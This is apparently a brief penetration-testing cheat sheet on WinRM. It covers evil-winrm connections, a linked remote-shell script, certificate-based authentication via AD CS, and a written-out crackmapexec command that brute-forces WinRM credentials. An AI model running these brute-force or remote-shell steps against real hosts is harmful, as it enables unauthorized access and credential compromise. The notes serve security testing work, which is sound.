WinRM
Port:5985
Enable WinRM
We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:
Connecting to WinRM
To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.
WinRM shell
Download the script and make necessary config changes.
In cse of an SSL error, change port from 5985 to 5986.
Brute-Force crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Certificate-based Authentication
We can use certificate-based auth(password-less) by creating certificates signed by the AD CS.
Pre-requisites:Access to Active Directory Certificate Services
Default location:
http://<IP>/certsrv/
Script Link: https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
Last updated